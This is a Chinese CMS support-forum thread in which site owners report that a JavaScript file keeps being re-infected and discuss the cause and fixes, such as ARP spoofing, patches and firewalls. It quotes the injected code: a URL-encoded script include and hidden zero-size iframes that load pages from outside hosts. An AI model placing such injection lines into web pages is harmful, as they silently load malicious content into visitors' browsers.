今天又被嵌入代码了，我一看ajax.js，里面多了

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

删除了再传，一会打开网页又被挂，却找不到是哪个文件被挂的。卡巴拦截的是这个文件地址：http://cc.zuiyige.net/ww/new09.htm

却找不到修改的地方。

再过一会去看ajax.js文件，又被挂了。官方能有办法解决这个漏洞吗？

我可是打上了最新的补丁的。

参考：

http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48882

根据你这个反应，很大可能性是arp挂马．非常符合arp特性！

可以先从服务器着手,装个arp防火墙，

你也可以做个实验．把所有科汛的asp文件都暂时删除，然后保留ks_inc文件夹观察，如果还是被挂上，肯定就是服务器安全做得不够

暂时解决方案：http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48878

额..是么?

帮你深入看了下```

这段代码 刚刚通过URL***得到

a.8e9.net\/1.js 这个JS地址

继续打开这个JS

发现:

iframe src=http:\/\/www.kiki01.net\/7.htm?ffff width=100 height=0><\/iframe>

以及<iframe src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/cnzz.htm width=0 height=0><\/iframe>");

你网页iframe的两个页面``而且因为 高度 或者宽度 为0 ...很难发现

如果再继续 打开这两个IFRAME的页面....我猜里面可能又会涉及到其他一些页面``

想跟你说的是``这个很符合ARP欺骗的象征`应该是说不排除被ARP攻击的原因`最好首先是检查下服务器漏洞...该打的补丁打上.找到恶意代码.删掉.立即打上ARP防火墙``..设置下文件权限``

如果这个还不行的话``.那我就真的无法相信 科讯系统 居然有那么大的注入漏洞?

可我服务器的其他网站没有中毒，怎么讲？

这个跟科讯 没关系..

是你服务器的问题```

要么是你服务器中毒了``要么就是遭受其他机器攻击``

把代码删掉``然后赶紧找个360的ARP防火墙装上``

清除了就又挂，不会超过2分钟，紧急求解决办法。

除了ajax.js外，另外一个不知道是哪个文件，希望官方帮忙解决。。

很严重啊` 考虑用不用这个了

我和楼主出现相同的情况，

见另外一个网友发的帖子，和我们类似。我在前天就出现了这种情况啦。

这个网友的帖子：

[注意]漏洞报告:Language.js   

里面也有我发的帖子链接，希望能引起官方重视~